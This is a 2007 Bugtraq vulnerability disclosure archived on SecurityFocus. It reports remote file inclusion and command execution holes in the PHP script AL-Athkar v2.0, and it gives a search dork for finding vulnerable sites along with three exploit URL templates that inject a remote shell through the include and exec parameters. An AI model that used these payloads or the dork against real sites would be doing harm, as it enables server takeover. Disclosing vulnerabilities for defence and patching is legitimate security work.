Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
BugTraq
AL-Athkar.v2.0 Remote File Include Aug 04 2007 04:04PM
RaeD BsdMail Com
Discovred By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Fairoz
----------------------------
Script: AL-Athkar.v2.0
----------------------------
Download: http://delmaa.com/upfile/users/AL-Athkar.v2.0.rar
----------------------------
Dork: "AL-Athkar.v2.0"
----------------------------
B.File:
index.php
----------------------------
Vuln code:Main.php?include
Vuln code:get.php?include
Vuln code:count.php?exec
----------------------------
Exploit:
Http://www.Victim.com/path/count.php?exec=[Shell-Attack]
Http://www.Victim.com/path/Main.php?include=[Shell-Attack]
Http://www.Victim.com/path/get.php?include=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>

[ reply ]




 

Privacy Statement
Copyright 2008, SecurityFocus